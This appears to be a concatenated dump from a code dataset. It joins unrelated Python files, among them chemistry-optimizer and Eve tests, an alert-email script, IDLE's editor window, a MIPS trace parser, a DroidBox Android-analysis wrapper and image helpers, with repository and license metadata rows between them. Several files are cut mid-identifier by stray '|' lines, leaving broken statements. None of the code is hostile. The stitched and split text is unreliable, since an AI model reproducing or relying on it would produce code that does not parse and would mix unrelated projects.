img.set_calculator(MullerBrownPot())
opt.run()
return opt
def animate(opt):
xlim = (-1.75, 1.25)
ylim = (-0.5, 2.25)
levels=(-150, -15, 40)
ap = AnimPlot(MullerBrownPot(), opt, xlim=xlim, ylim=ylim, levels=levels)
ap.animate()
@pytest.mark.sd
def test_steepest_descent_neb():
kwargs = copy.copy(KWARGS)
kwargs["images"] = 4
neb = NEB(get_geoms())
opt = run_cos_opt(neb, SteepestDescent, **kwargs)
assert(opt.is_converged)
assert(opt.cur_cycle == 56)
return opt
@pytest.mark.sd
def test_steepest_descent_straight_neb():
"""Something is really really wrong here."""
kwargs = copy.copy(KWARGS)
kwargs["images"] = 10
kwargs["max_cycles"] = 100
convergence = {
"max_force_thresh": 1.16,
"rms_force_thresh": 0.27,
"max_step_thresh": 0.021,
"rms_step_thresh": 0.005,
}
kwargs["convergence"] = convergence
neb = NEB(get_geoms(("A", "B")))
opt = run_cos_opt(neb, SteepestDescent, **kwargs)
assert(opt.is_converged)
assert(opt.cur_cycle == 62)
return opt
@pytest.mark.bfgs
def test_bfgs_straight_neb():
"""Something is really really wrong here."""
kwargs = copy.copy(KWARGS)
kwargs["images"] = 10
convergence = {
"max_force_thresh": 5.0,
"rms_force_thresh": 1,
"max_step_thresh": 0.002,
"rms_step_thresh": 0.0006,
}
kwargs["convergence"] = convergence
neb = NEB(get_geoms(("A", "B")))
opt = run_cos_opt(neb, BFGS, **kwargs)
assert(opt.is_converged)
assert(opt.cur_cycle == 45)
return opt
@pytest.mark.lbfgs
def test_lbfgs_neb():
kwargs = copy.copy(KWARGS)
kwargs["images"] = 3
kwargs["fix_ends"] = True
k_min = 1000
k_max = k_min+10
neb = NEB(get_geoms(("A", "B")), k_min=k_min, k_max=k_max, fix_ends=True)
from pysisyphus.optimizers.ConjugateGradient import ConjugateGradient
# from pysisyphus.optimizers.LBFGS_mod import LBFGS
opt = run_cos_opt(neb, LBFGS, **kwargs)
# assert(opt.is_converged)
# assert(opt.cur_cycle == 45)
return opt
@pytest.mark.sd
def test_steepest_descent_neb_more_images():
kwargs = copy.copy(KWARGS)
kwargs["images"] = 7
convergence = {
"max_force_thresh": 0.6,
"rms_force_thresh": 0.13,
"max_step_thresh": 0.015,
"rms_step_thresh": 0.0033,
}
kwargs["convergence"] = convergence
neb = NEB(get_geoms())
opt = run_cos_opt(neb, SteepestDescent, **kwargs)
assert(opt.is_converged)
assert(opt.cur_cycle == 41)
return opt
@pytest.mark.fire
def test_fire_neb():
kwargs = copy.copy(KWARGS)
kwargs["dt"] = 0.01
kwargs["dt_max"] = 0.1
neb = NEB(get_geoms())
opt = run_cos_opt(neb, FIRE, **kwargs)
assert(opt.is_converged)
assert(opt.cur_cycle == 76)
return opt
def test_equal_szts():
kwargs = copy.copy(KWARGS)
convergence = {
"rms_force_thresh": 2.4,
}
kwargs["convergence"] = convergence
szts_equal = SimpleZTS(get_geoms(), param="equal")
opt = run_cos_opt(szts_equal, SteepestDescent, **kwargs)
assert(opt.is_converged)
assert(opt.cur_cycle == 17)
return opt
def test_equal_szts_straight():
kwargs = copy.copy(KWARGS)
kwargs["images"] = 10
kwargs["max_step"] = 0.04
convergence = {
"rms_force_thresh": 2.4,
}
kwargs["convergence"] = convergence
szts_equal = SimpleZTS(get_geoms(("A", "B")), param="equal")
opt = run_cos_opt(szts_equal, SteepestDescent, **kwargs)
return opt
def test_equal_szts_more_images():
kwargs = copy.copy(KWARGS)
kwargs["images"] = 7
convergence = {
"rms_force_thresh": 2.4,
}
kwargs["convergence"] = convergence
szts_equal = SimpleZTS(get_geoms(), param="equal")
opt = run_cos_opt(szts_equal, SteepestDescent, **kwargs)
assert(opt.is_converged)
assert(opt.cur_cycle == 21)
return opt
def test_energy_sz
|
ts()
|
:
kwargs = copy.copy(KWARGS)
convergence = {
"rms_force_thresh": 2.8,
}
kwargs["convergence"] = convergence
szts_energy = SimpleZTS(get_geoms(), param="energy")
opt = run_cos_opt(szts_energy, SteepestDescent, **kwargs)
assert(opt.is_converged)
assert(opt.cur_cycle == 15)
return opt
def test_energy_szts_more_images():
kwargs = copy.copy(KWARGS)
kwargs["images"] = 10
convergence = {
"rms_force_thresh": 1.7,
}
kwargs["convergence"] = convergence
szts_energy = SimpleZTS(get_geoms(), param="energy")
opt = run_cos_opt(szts_energy, SteepestDescent, **kwargs)
assert(opt.is_converged)
assert(opt.cur_cycle == 22)
return opt
if __name__ == "__main__":
# Steepest Descent
opt = test_steepest_descent_neb()
#opt = test_steepest_descent_straight_neb()
#opt = test_steepest_descent_neb_more_images()
# opt = test_bfgs_straight_neb()
# opt = test_lbfgs_neb()
# FIRE
#opt = test_fire_neb()
# SimpleZTS
#opt = test_equal_szts()
#opt = test_equal_szts_straight()
#opt = test_equal_szts_more_images()
#opt = test_energy_szts()
#opt = test_energy_szts_more_images()
ap = animate(opt)
plt.show()
|
amicojeko/YouCantTouchThis
|
sendemail.py
|
Python
|
gpl-3.0
| 2,259
| 0.009296
|
# coding=utf-8
# Copyright (C) 2014 Stefano Guglielmetti
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import smtplib, os, sys
from email.MIMEMultipart import MIMEMultipart
from email.MIMEBase import MIMEBase
from email.MIMEText import MIMEText
from email.Utils import COMMASPACE, formatdate
from email import Encoders
#From address, to address, subject and message body
from_address = 'EMAIL_FROM_ADDRESS'
to_address = ['EMAIL_TO_ADDRESS']
email_subject = 'Alert!!! Zombies!!! Ahead!!!'
email_body = 'An intruder has been detected and needs to be eliminated!'
# Credentials (if needed)
username = 'YOUR_EMAIL_USERNAME'
password = 'YOUR_EMAIL_PASSWORD'
# The actua
|
l mail send
server = 'smtp.gmail.com:587'
def send_mail(send_from, send_to, subject, text, files=[], server="localhost"):
assert type(send_to)==list
assert typ
|
e(files)==list
msg = MIMEMultipart()
msg['From'] = send_from
msg['To'] = COMMASPACE.join(send_to)
msg['Date'] = formatdate(localtime=True)
msg['Subject'] = subject
msg.attach( MIMEText(text) )
for f in files:
part = MIMEBase('application', "octet-stream")
part.set_payload( open(f,"rb").read() )
Encoders.encode_base64(part)
part.add_header('Content-Disposition', 'attachment; filename="%s"' % os.path.basename(f))
msg.attach(part)
smtp = smtplib.SMTP(server)
smtp.starttls()
smtp.login(username,password)
smtp.sendmail(send_from, send_to, msg.as_string())
smtp.close()
send_mail(from_address, to_address, email_subject, email_body, [sys.argv[1]], server) #the first command line argument will be used as the image file name
|
david415/tahoe-lafs
|
src/allmydata/test/test_configutil.py
|
Python
|
gpl-2.0
| 3,451
| 0.00058
|
import os.path
from twisted.trial import unittest
from allmydata.util import configutil
from allmydata.test.no_network import GridTestMixin
from ..scripts import create_node
from .. import client
class ConfigUtilTests(GridTestMixin, unittest.TestCase):
def test_config_utils(self):
self.basedir = "cli/C
|
onfigUtilTests/test-config-utils"
self.set_up_grid(oneshare=True)
tahoe_cfg = os.path.join(self.get_clientdir(i=0), "tahoe.cfg")
# test that at least one option was read correctly
config = configutil.get_config(tahoe_cfg)
self.failUnlessEqual(config.get("node", "nickname"), "client-0")
|
# test that set_config can mutate an existing option
configutil.set_config(config, "node", "nickname", "Alice!")
configutil.write_config(tahoe_cfg, config)
config = configutil.get_config(tahoe_cfg)
self.failUnlessEqual(config.get("node", "nickname"), "Alice!")
# test that set_config can set a new option
descriptor = "Twas brillig, and the slithy toves Did gyre and gimble in the wabe"
configutil.set_config(config, "node", "descriptor", descriptor)
configutil.write_config(tahoe_cfg, config)
config = configutil.get_config(tahoe_cfg)
self.failUnlessEqual(config.get("node", "descriptor"), descriptor)
def test_config_validation_success(self):
d = self.mktemp()
os.mkdir(d)
fname = os.path.join(d, 'tahoe.cfg')
with open(fname, 'w') as f:
f.write('[node]\nvalid = foo\n')
config = configutil.get_config(fname)
# should succeed, no exceptions
configutil.validate_config(fname, config, dict(node=['valid']))
def test_config_validation_invalid_item(self):
d = self.mktemp()
os.mkdir(d)
fname = os.path.join(d, 'tahoe.cfg')
with open(fname, 'w') as f:
f.write('[node]\nvalid = foo\ninvalid = foo\n')
config = configutil.get_config(fname)
e = self.assertRaises(
configutil.UnknownConfigError,
configutil.validate_config,
fname, config, dict(node=['valid']),
)
self.assertIn("section [node] contains unknown option 'invalid'", str(e))
def test_config_validation_invalid_section(self):
d = self.mktemp()
os.mkdir(d)
fname = os.path.join(d, 'tahoe.cfg')
with open(fname, 'w') as f:
f.write('[node]\nvalid = foo\n[invalid]\n')
config = configutil.get_config(fname)
e = self.assertRaises(
configutil.UnknownConfigError,
configutil.validate_config,
fname, config, dict(node=['valid']),
)
self.assertIn("contains unknown section [invalid]", str(e))
def test_create_client_config(self):
d = self.mktemp()
os.mkdir(d)
fname = os.path.join(d, 'tahoe.cfg')
with open(fname, 'w') as f:
opts = {"nickname": "nick",
"webport": "tcp:3456",
"hide-ip": False,
"listen": "none",
}
create_node.write_node_config(f, opts)
create_node.write_client_config(f, opts)
config = configutil.get_config(fname)
# should succeed, no exceptions
configutil.validate_config(fname, config,
client._valid_config_sections())
|
ianyh/heroku-buildpack-python-opencv
|
vendor/.heroku/lib/python2.7/idlelib/EditorWindow.py
|
Python
|
mit
| 66,031
| 0.001817
|
import sys
import os
import re
import imp
from Tkinter import *
import tkSimpleDialog
import tkMessageBox
import webbrowser
from idlelib.MultiCall import MultiCallCreator
from idlelib import idlever
from idlelib import WindowList
from idlelib import SearchDialog
from idlelib import GrepDialog
from idlelib import ReplaceDialog
from idlelib import PyParse
from idlelib.configHandler import idleConf
from idlelib import aboutDialog, textView, configDialog
from idlelib import macosxSupport
# The default tab setting for a Text widget, in average-width characters.
TK_TABWIDTH_DEFAULT = 8
def _sphinx_version():
"Format sys.version_info to produce the Sphinx version string used to install the chm docs"
major, minor, micro, level, serial = sys.version_info
release = '%s%s' % (major, minor)
if micro:
release += '%s' % (micro,)
if level == 'candidate':
release += 'rc%s' % (serial,)
elif level != 'final':
release += '%s%s' % (level[0], serial)
return release
def _find_module(fullname, path=None):
"""Version of imp.find_module() that handles hierarchical module names"""
file = None
for tgt in fullname.split('.'):
if file is not None:
file.close() # close intermediate files
(file, filename, descr) = imp.find_module(tgt, path)
if descr[2] == imp.PY_SOURCE:
break # find but not load the source file
module = imp.load_module(tgt, file, filename, descr)
try:
path = module.__path__
except AttributeError:
raise ImportError, 'No source for module ' + module.__name__
if descr[2] != imp.PY_SOURCE:
# If all of the above fails and didn't raise an exception,fallback
# to a straight import which can find __init__.py in a package.
m = __import__(fullname)
try:
filename = m.__file__
except AttributeError:
pass
else:
file = None
base, ext = os.path.splitext(filename)
if ext == '.pyc':
ext = '.py'
filename = base + ext
descr = filename, None, imp.PY_SOURCE
return file, filename, descr
class HelpDialog(object):
def __init__(self):
self.parent = None # parent of help window
self.dlg = None # the help window iteself
def display(self, parent, near=None):
""" Display the help dialog.
parent - parent widget for the help window
near - a Toplevel widget (e.g. EditorWindow or PyShell)
to use as a reference for placing the help window
"""
if self.dlg is None:
self.show_dialog(parent)
if near:
self.nearwindow(near)
def show_dialog(self, parent):
self.parent = parent
fn=os.path.join(os.path.abspath(os.path.dirname(__file__)),'help.txt')
self.dlg = dlg = textView.view_file(parent,'Help',fn, modal=False)
dlg.bind('<Destroy>', self.destroy, '+')
def nearwindow(self, near):
# Place the help dialog near the window specified by parent.
# Note - this may not reposition the window in Metacity
# if "/apps/metacity/general/disable_workarounds" is enabled
dlg = self.dlg
geom = (near.winfo_rootx() + 10, near.winfo_rooty() + 10)
dlg.withdraw()
dlg.geometry("=+%d+%d" % geom)
dlg.deiconify()
dlg.lift()
def destroy(self, ev=None):
self.dlg = None
self.parent = None
helpDialog = HelpDialog() # singleton instance
class EditorWindow(object):
from idlelib.Percolator import Percolator
from idlelib.ColorDelegator import ColorDelegator
from idlelib.UndoDelegator import UndoDelegator
from idlelib.IOBinding import IOBinding, filesystemencoding, encoding
from idlelib import Bindings
from Tkinter import Toplevel
from idlelib.MultiStatusBar import MultiStatusBar
help_url = None
def __init__(self, flist=None, filename=None, key=None, root=None):
if EditorWindow.help_url is None:
dochome = os.path.join(sys.prefix, 'Doc', 'index.html')
if sys.platform.count('linux'):
# look for html docs in a couple of standard places
pyver = 'python-docs-' + '%s.%s.%s' % sys.version_info[:3]
if os.path.isdir('/var/www/html/python/'): # "python2" rpm
dochome = '/var/www/html/python/index.html'
else:
basepath = '/usr/share/doc/' # standard location
dochome = os.path.join(basepath, pyver,
'Doc', 'index.html')
elif sys.platform[:3] == 'win':
chmfile = os.path.join(sys.prefix, 'Doc',
'Python%s.chm' % _sphinx_version())
if os.path.isfile(chmfile):
dochome = chmfile
elif macosxSupport.runningAsOSXApp():
# docum
|
entation is stored inside the python framework
dochome = os.path.join(sys.prefix,
'Resources/Engli
|
sh.lproj/Documentation/index.html')
dochome = os.path.normpath(dochome)
if os.path.isfile(dochome):
EditorWindow.help_url = dochome
if sys.platform == 'darwin':
# Safari requires real file:-URLs
EditorWindow.help_url = 'file://' + EditorWindow.help_url
else:
EditorWindow.help_url = "http://docs.python.org/%d.%d" % sys.version_info[:2]
currentTheme=idleConf.CurrentTheme()
self.flist = flist
root = root or flist.root
self.root = root
try:
sys.ps1
except AttributeError:
sys.ps1 = '>>> '
self.menubar = Menu(root)
self.top = top = WindowList.ListedToplevel(root, menu=self.menubar)
if flist:
self.tkinter_vars = flist.vars
#self.top.instance_dict makes flist.inversedict available to
#configDialog.py so it can access all EditorWindow instances
self.top.instance_dict = flist.inversedict
else:
self.tkinter_vars = {} # keys: Tkinter event names
# values: Tkinter variable instances
self.top.instance_dict = {}
self.recent_files_path = os.path.join(idleConf.GetUserCfgDir(),
'recent-files.lst')
self.text_frame = text_frame = Frame(top)
self.vbar = vbar = Scrollbar(text_frame, name='vbar')
self.width = idleConf.GetOption('main','EditorWindow','width', type='int')
text_options = {
'name': 'text',
'padx': 5,
'wrap': 'none',
'width': self.width,
'height': idleConf.GetOption('main', 'EditorWindow', 'height', type='int')}
if TkVersion >= 8.5:
# Starting with tk 8.5 we have to set the new tabstyle option
# to 'wordprocessor' to achieve the same display of tabs as in
# older tk versions.
text_options['tabstyle'] = 'wordprocessor'
self.text = text = MultiCallCreator(Text)(text_frame, **text_options)
self.top.focused_widget = self.text
self.createmenubar()
self.apply_bindings()
self.top.protocol("WM_DELETE_WINDOW", self.close)
self.top.bind("<<close-window>>", self.close_event)
if macosxSupport.runningAsOSXApp():
# Command-W on editorwindows doesn't work without this.
text.bind('<<close-window>>', self.close_event)
# Some OS X systems have only one mouse button,
# so use control-click for pulldown menus there.
# (Note, AquaTk defines <2> as the right button if
# present and the Tk Text widget already binds <2>.)
text.bind("<Control-Button-1>",self.right_menu_event)
else:
# Elsewhere, use right-click for pulldown menus.
text.bind("
|
robinandeer/chanjo
|
tests/test_calculate.py
|
Python
|
mit
| 2,295
| 0
|
"""Test calculate module"""
from chanjo.store.models import Sample
def test_mean(populated_db):
"""Test for calculating mean coverage"""
# GIVEN a database loaded with 2 samples
assert Sample.query.count() == 2
# WHEN calculating mean values across metrics
query = populated_db.mean()
# THEN the results should group over 2 "rows"
results = query.all()
assert len(results) == 2
sample_ids = set(result[0] for result in results)
assert sample_ids == set(['sample', 'sample2']) # sample id
result = results[0]
for metric in filter(None, result[1:]):
assert isinstance(metric, float)
def test_mean_with_samples(populated_db):
"""Test for caluclating mean with samples"""
# GIVEN a database loaded with 2 samples
assert Sample.query.count() == 2
# WHEN calculating mean values across metrics for a particular sample
sample_id = 'sample'
query = populated_db.mean(sample_ids=[sample_id])
# THEN the results should be
|
limited to that sample
results = query.all()
assert len(results) == 1
result = results[0]
assert result[0] == sample_id
def test_gene(populated_db):
"""Test for calculating gene metrics"""
# GIVEN a database populated with a single sample
assert Sample.query.count() == 2
# WHEN calculating average metrics for a gene
gene_id = 28706
query = populated_db.gene_metrics(gene_id)
|
# THEN the results should add up to a single row
results = query.all()
assert len(results) == 2
result = results[0]
assert result[0] == 'sample'
assert result[-1] == gene_id
def test_sample_coverage(populated_db):
"""Test for OMIM coverage"""
# GIVEN a database populated with two samples
assert Sample.query.count() == 2
sample_ids = ('sample', 'sample2')
gene_ids = (14825, 28706)
# WHEN calculating coverage for sample 'sample' on gene 14825
query = populated_db.sample_coverage(sample_ids=sample_ids, genes=gene_ids)
# THEN query should be a dict with samples as keys, where each sample
# is a dict with keys mean_coverage and mean completeness
assert set(query.keys()) == set(sample_ids)
for _, value in query.items():
assert set(value.keys()) == set(['mean_coverage', 'mean_completeness'])
|
sergev/vak-opensource
|
languages/python/simtrace.py
|
Python
|
apache-2.0
| 3,176
| 0.007557
|
#!/usr/bin/python
# -*- encoding: utf-8 -*-
#
# Print the sequence of function calls from the Imperas trace file.
#
import sys, string, subprocess, bisect
if len(sys.argv) != 3:
print "Usage: simtrace file.trace vmunix.elf"
sys.exit (1)
# Extract the list of symbols from the binary executable.
nm_command = subprocess.Popen ("nm "+sys.argv[2], shell = True, stdout = subprocess.PIPE)
table = {}
max_addr = 0
for line in nm_command.stdout.readlines():
word = line.split()
addr = int(word[0], 16)
func = word[2]
table[addr] = func
if addr > max_addr:
max_addr = addr
#print "%08x = %s" % (addr, func)
table_keys = sorted(table.keys())
#print table_keys
# Find a name of the function for the given address.
# Return the name and the offset.
def find_function (addr):
if addr <= max_addr:
i = bisect.bisect_right(table_keys, addr)
if i > 0:
last = table_keys[i-1]
return (table[last], addr - last)
return ("", 0)
# Print a function name for the given address.
last_func = ""
def process_instruction(addr, level):
#print "--- process_instruction(%#x)" % addr
global last_func
(func, offset) = find_function (addr)
if func != last_func:
if offset == 0:
print "%08x : %*s%s" % (addr, level*2, "", func)
else:
print "%08x : %*s%s + %u" % (addr, level*2, "", func, offset)
last_func = func
# Check whether the string is a hex number
hex_digits = set(string.hexdigits)
def is_hex(s):
return all(c in hex_digits for c in s)
# Read the trace file.
trace_file = open (sys.argv[1])
pc = 0
op = ""
last_op = ""
level = 0
for line in trace_file.readlines()
|
:
word = line.split()
if len(word) > 0 and word[0] == "---":
if pc > max_addr and len(word) == 6 and
|
word[1] == "I/O" and \
word[2] == "Read" and word[5] == "U4STA":
# Skip bootloader timeout
continue
# Print i/o events.
print line.strip()
continue
if len(word) > 1 and word[0] == "Info" and word[1] == "(MIPS32_EXCEPT)":
# Print exceptions.
print "---", string.join(word[3:])
continue
if len(word) < 7:
continue
va = word[2]
pa = word[3]
cca = word[4]
if not (word[1] == ":" and
len(va) == 8 and len(pa) == 8 and
is_hex(va) and is_hex(pa)):
continue
pc = int(va, 16)
# Skip bootloader region.
if pc > max_addr:
continue
if cca != "2:" and cca != "3:":
print "Warning: unexpected CCA value!"
if last_op == "JAL":
level = level + 1
elif last_op == "JR":
level = level - 1
#print pc, ":", string.join(word[6:])
process_instruction(pc, level)
# Keep the history of two last instructions
last_op = op
op = word[6]
if word[6] == "JAL" or word[6] == "JALR":
op = "JAL"
elif (word[6] == "JR" or word[6] == "JR.HB") and word[7] == "$31":
op = "JR"
else:
op = ""
# Print the last executed address.
if pc != 0:
last_func = ""
print "=== Stopped at: ==="
process_instruction(pc, 0)
|
nastya/droidbot
|
droidbox_scripts/droidbox_compatible.py
|
Python
|
mit
| 24,119
| 0.006468
|
# I have to modify droidbox scripts to let it work with droidbot
# This is a compatible version which generate a report with the same format of original DroidBox
__author__ = 'yuanchun'
################################################################################
# (c) 2011, The Honeynet Project
# Author: Patrik Lantz patrik@pjlantz.com and Laurent Delosieres ldelosieres@hispasec.com
#
# This program is free software you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
#
################################################################################
"""
Analyze dynamically Android applications
This script allows you to analyze dynamically Android applications.
It installs, runs, and analyzes Android applications.
At the end of each analysis, it outputs the Android application's characteristics in JSON.
Please keep in mind that all data received/sent,
read/written are shown in hexadecimal since the handled data can contain binary data.
"""
import json, time, signal, os, sys
import zipfile
import subprocess
import threading
from threading import Thread
from xml.dom import minidom
from subprocess import call, PIPE, Popen
from utils import AXMLPrinter
import hashlib
tags = {0x1: "TAINT_LOCATION", 0x2: "TAINT_CONTACTS", 0x4: "TAINT_MIC", 0x8: "TAINT_PHONE_NUMBER",
0x10: "TAINT_LOCATION_GPS", 0x20: "TAINT_LOCATION_NET", 0x40: "TAINT_LOCATION_LAST", 0x80: "TAINT_CAMERA",
0x100: "TAINT_ACCELEROMETER", 0x200: "TAINT_SMS", 0x400: "TAINT_IMEI", 0x800: "TAINT_IMSI",
0x1000: "TAINT_ICCID", 0x2000: "TAINT_DEVICE_SN", 0x4000: "TAINT_ACCOUNT", 0x8000: "TAINT_BROWSER",
0x10000: "TAINT_OTHERDB", 0x20000: "TAINT_FILECONTENT", 0x40000: "TAINT_PACKAGE", 0x80000: "TAINT_CALL_LOG",
0x100000: "TAINT_EMAIL", 0x200000: "TAINT_CALENDAR", 0x400000: "TAINT_SETTINGS"}
class LostADBException(Exception):
pass
class DroidBox(object):
def __init__(self, output_dir=None):
self.sendsms = {}
self.phonecalls = {}
self.cryptousage = {}
self.dexclass = {}
self.dataleaks = {}
self.opennet = {}
self.sendnet = {}
self.recvnet = {}
self.closenet = {}
self.fdaccess = {}
self.servicestart = {}
self.accessedfiles = {}
self.enabled = True
self.adb = None
self.application = None
self.apk_name = None
self.apk_hashes = None
self.applicationStarted = 0
self.is_counting_logs = False
self.timer = None
if output_dir:
self.output_dir = output_dir
if not os.path.exists(self.output_dir):
os.mkdir(self.output_dir)
else:
#Posibility that no output-files is generated
self.output_dir = None
def set_apk(self, apk_name):
if not self.enabled:
return
if apk_name is None:
return
# APK existing?
if not os.path.isfile(apk_name):
print("File %s not found" % apk_name)
sys.exit(1)
self.apk_name = os.path.abspath(apk_name)
self.application = Application(apk_name)
ret = self.application.processAPK()
# Error during the APK processing?
if ret == 0:
print("Failed to analyze the APK. Terminate the analysis.")
sys.exit(1)
main_activity = self.application.getMainActivity()
package_name = self.application.getPackage()
self.apk_hashes = self.application.getHashes()
# No Main acitvity found? Return an error
if main_activity == None:
print("No activity to start. Terminate the analysis.")
sys.exit(1)
# No packages identified? Return an error
if package_name == None:
print("No package found. Terminate the anal
|
ysis.")
sys.exit(1)
# Execute the application
call(["adb", "logcat", "-c"])
ret = call(['monkeyrunner', 'monkeyrunner.py', apk_name,
package_name, main_activity], stderr=None,
cwd=os.path.dirname(os.path.realpath(__file__)))
if (ret == 1):
print("Failed to execute the application.")
sys.exit(1)
print("Starting the ac
|
tivity %s..." % main_activity)
# By default the application has not started
self.applicationStarted = 0
stringApplicationStarted = "Start proc %s" % package_name
# Open the adb logcat
if self.adb is None:
self.adb = Popen(["adb", "logcat", "DroidBox:W", "dalvikvm:W", "ActivityManager:I"], stdin=subprocess.PIPE,
stdout=subprocess.PIPE)
# Wait for the application to start
while 1:
try:
logcatInput = self.adb.stdout.readline()
if not logcatInput:
raise Exception("We have lost the connection with ADB.")
# Application started?
if (stringApplicationStarted in logcatInput):
self.applicationStarted = 1
break
except:
break
if (self.applicationStarted == 0):
print("Analysis has not been done.")
# Kill ADB, otherwise it will never terminate
os.kill(self.adb.pid, signal.SIGTERM)
sys.exit(1)
print("Application started")
def start_unblocked(self, duration=0):
droidbox_thread = threading.Thread(target=self.start_blocked, args=(duration,))
droidbox_thread.start()
def stop(self):
self.enabled = False
if self.timer and self.timer.isAlive():
self.timer.cancel()
if self.adb is not None:
self.adb.terminate()
self.adb = None
def start_blocked(self, duration=0):
if not self.enabled:
return
# curses.setupterm()
# sys.stdout.write(curses.tigetstr("clear"))
sys.stdout.flush()
call(["adb", "wait-for-device"])
call(['adb', 'logcat', '-c'])
print " ____ __ ____"
print "/\ _`\ __ /\ \/\ _`\\"
print "\ \ \/\ \ _ __ ___ /\_\ \_\ \ \ \L\ \ ___ __ _"
print " \ \ \ \ \/\`'__\ __`\/\ \ /'_` \ \ _ <' / __`\/\ \/'\\"
print " \ \ \_\ \ \ \/\ \L\ \ \ \/\ \L\ \ \ \L\ \\ \L\ \/> </"
print " \ \____/\ \_\ \____/\ \_\ \___,_\ \____/ \____//\_/\_\\"
print " \/___/ \/_/\/___/ \/_/\/__,_ /\/___/ \/___/ \//\/_/"
count = CountingThread()
count.start()
timeStamp = time.time()
if duration:
self.timer = threading.Timer(duration, self.stop)
self.timer.start()
if self.adb is None:
self.adb = Popen(["adb", "logcat", "-v", "threadtime", "DroidBox:W", "dalvikvm:W", "ActivityManager:I"],
stdin=subprocess.PIPE, stdout=subprocess.PIPE)
# Collect DroidBox logs
self.is_counting_logs = True
self.lastScreenshot = 0
first_log_time = None
from droidbot.state_monitor import StateMonitor
state_monitor = StateMonitor()
state_monitor.start()
while self.enabled:
try:
if self.output_dir and (time.time() - self.lastScreenshot) >=5:
# Take screenshots every 5 seconds.
os.system("adb shell screencap -p | sed 's/\r$//' > %s" % os.path.join(self.output_dir, "screen") \
|
sintrb/urlimg
|
img/funs.py
|
Python
|
gpl-2.0
| 2,541
| 0.006528
|
# -*- coding: UTF-8 -*
'''
Created on 2015年1月18日
@author: RobinTang
'''
try:
import Image, ImageDraw, ImageFont, ImageFilter
except:
pass
try:
from PIL import Image, ImageDraw, ImageFont, ImageFilter
except:
pass
import StringIO
filters = {
('blur', ImageFilter.BLUR, '模糊滤镜'),
('contour', ImageFilter.CONTOUR, '轮廓'),
('edge_enhance', ImageFilter.EDGE_ENHANCE, '边界加强'),
('edge_enhance_more', ImageFilter.EDGE_ENHANCE_MORE, '边界加强(阀值更大)'),
('emboss', ImageFilter.EMBOSS, '浮雕滤镜'),
('find_edges', ImageFilter.FIND_EDGES, '边界滤镜'),
('smooth', ImageFilter.SMOOTH, '平滑滤镜'),
('smooth_more', ImageFilter.SMOOTH_MORE, '平滑滤镜(阀值更大)'),
('sharpen', ImageFilter.SHARPEN, '锐化滤镜'),
}
filtersmap = dict([(v[0], (v[1], v[2])) for v in filters])
def getfont(size):
import os, sys
try:
file_name = os.path.dirname(sys.modules['img'].__file__)
|
path = os.path.abspath(file_name)
except:
path = ''
font = ImageFont.truetype(os.path.join(path, "font.ttf"), size)
return font
def fitto(src, dw=360, dh=200):
dst = Image.new("RGBA", (dw, dh), (255, 255, 255, 0))
sw = src.siz
|
e[0]
sh = src.size[1]
kw = float(sw) / float(dw)
kh = float(sh) / float(dh)
w, h = 0, 0
if kw > kh:
w, h = int(dw), int(sh / kw)
else:
w, h = int(sw / kh), int(dh)
nsrc = src.resize((w, h),)
x = (dw - w) / 2
y = (dh - h) / 2
dst.paste(nsrc, (x, y, x + w, y + h))
return dst
def watermark(m, s, color=(0, 0, 0, 255), size=20):
draw = ImageDraw.Draw(m)
font = getfont(size)
fsize = font.getsize(s)
draw.text((m.size[0] - fsize[0] - fsize[1] / 5, m.size[1] - fsize[1]), s, font=font, fill=color)
return m
def getimg(path):
if path.startswith("http://") or path.startswith("https://"):
import urllib2
import io
dats = io.BytesIO(urllib2.urlopen(path).read())
m = Image.open(dats)
# dats.close()
return m
else:
return Image.open(path)
def getimgwithdats(dats):
m = Image.open(dats)
return m
def getimgbytes(m, fmt="png"):
out = StringIO.StringIO()
m.save(out, fmt)
out.seek(0)
dats = out.read()
out.close()
return dats
if __name__ == "__main__":
m = getimg("http://img0.bdstatic.com/img/image/shouye/xinshouye/meishi116.jpg")
m = fitto(m, 300, 300)
m = watermark(m, "Powered by Sin")
m.show()
|
drptbl/webium
|
webium/settings.py
|
Python
|
apache-2.0
| 251
| 0
|
from selenium.webdriver import Firefox
from selenium.webdriver.common.by import By
driver_class =
|
Firefox
implicit_timeout = 30
wait_timeout = 30
default_search_type = By.ID
try:
from local_webium_settings import *
except ImportError:
pass
| |
jzorrof/eve
|
eve/tests/methods/patch.py
|
Python
|
bsd-3-clause
| 25,507
| 0
|
from bson import ObjectId
import simplejson as json
from eve.tests import TestBase
from eve.tests.test_settings import MONGO_DBNAME
from eve.tests.utils import DummyEvent
from eve import STATUS_OK, LAST_UPDATED, ID_FIELD, ISSUES, STATUS, ETAG
from eve.methods.patch import patch_internal
class TestPatch(TestBase):
def test_patch_to_resource_endpoint(self):
_, status = self.patch(self.known_resource_url, data={})
self.assert405(status)
def test_readonly_resource(self):
_, status = self.patch(self.readonly_id_url, data={})
self.assert405(status)
def test_unknown_id(self):
_, status = self.patch(self.unknown_item_id_url,
data={"key1": 'value1'})
self.assert404(status)
def test_unknown_id_different_resource(self):
# patching a 'user' with a valid 'contact' id will 404
_, status = self.patch('%s/%s/' % (self.different_resource,
self.item_id),
data={"key1": "value1"})
self.assert404(status)
# of course we can still patch a 'user'
_, status = self.patch('%s/%s/' % (self.different_resource,
self.user_id),
data={'key1': '{"username": "username1"}'},
headers=[('If-Match', self.user_etag)])
self.assert200(status)
def test_by_name(self):
_, status = self.patch(self.item_name_url, data={'key1': 'value1'})
self.assert405(status)
def test_ifmatch_missing(self):
_, status = self.patch(self.item_id_url, data={'key1': 'value1'})
self.assert403(status)
def test_ifmatch_disabled(self):
self.app.config['IF_MATCH'] = False
r, status = self.patch(self.item_id_url, data={'key1': 'value1'})
self.assert200(status)
